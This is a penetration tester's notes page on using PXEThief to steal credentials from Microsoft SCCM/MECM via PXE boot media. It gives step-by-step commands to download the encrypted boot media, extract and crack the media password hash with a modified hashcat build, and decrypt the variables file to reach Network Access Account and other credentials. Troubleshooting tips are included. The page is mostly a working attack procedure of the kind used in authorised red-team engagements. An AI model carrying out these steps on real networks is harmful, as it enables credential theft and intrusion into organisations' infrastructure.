# pxethief
[pxethief](https://github.com/MWR-CyberSec/PXEThief) helps you pull credentials out of SCCM via its PXE boot media.

:::info
Good news! I've had good success getting pxethief to run on Linux by following these steps. First, get the proper 

```
git clone https://github.com/MWR-CyberSec/PXEThief.git
cd PXEThief
git fetch origin pull/11/head:pr-11
git checkout pr-11
```

Then I found this works pretty well for getting it rocking in a venv:

```
python3 -m venv venv
source venv/bin/activate
sudo venv/bin/python3 -m pip install -r requirements.txt 
sudo venv/bin/python3 pxethief.py
```
:::

## Install
Get the 64-bit Python installer from python.org, then install the requirements:
```
pip install -r requirements.txt
```
I'm having [this issue](https://github.com/MWR-CyberSec/PXEThief/issues/10).  

## General enumeration - automatically download the encrypted media file using DHCP PXE
```
pxethief.py 1
```

## Target a specific MECM DP
```
pxethief.py 2 1.2.3.4
```
:::tip
For the automatic download to work on Windows, the TFTP client feature must be enabled:
```
powershell Enable-WindowsOptionalFeature -FeatureName TFTP -Online
```
:::

## Identify hash of the password that was used to encrypt the variables
```
pxethief.py 5 boot.var
```
*Note: `boot.var` is a file you might find in the `\\SCCMSERVER\REMINST\SMSTEMP` folder.*

### Crack the extracted hash
I found it easier to use the [hashcat-6.2.6-SCCM](https://github.com/The-Viper-One/hashcat-6.2.6-SCCM) version of hashcat, and then use this syntax:

```
hashcat-6.2.6-SCCM.exe -m 19850 hash.txt bigbadwordlist.txt
```

## Decrypt and retrieve contents of the media variables file (if cracking was successful)
```
pxethief.py 3 somevariablesfile.var YOUR-CRACKED-PASSWORD-GOES-HERE
```

At this point you should be able to obtain a certificate that is used to request SCCM policies and task sequences, which may contain the NAA or other credentials.

:::tip
I sometimes have a heck of a time getting this attack to work, but I opened a GitHub [issue](https://github.com/MWR-CyberSec/PXEThief/issues/12) that helped me.  I also had a situation where the decryption routine seemed to work and I got a funky `UnicodeDecodeError: 'utf-16-le' codec can't decode bytes in position 236-237: illegal encoding` error.  I opened an [issue](https://github.com/MWR-CyberSec/PXEThief/issues/14) for this and the fix ended up being to comment/uncomment some lines following [this guidance](https://github.com/MWR-CyberSec/PXEThief/issues/1#issuecomment-1833467137) and then setting `USING_TLS` to `False` in the script:

```
USING_TLS = False #HTTPS and client certificate support
```

:::
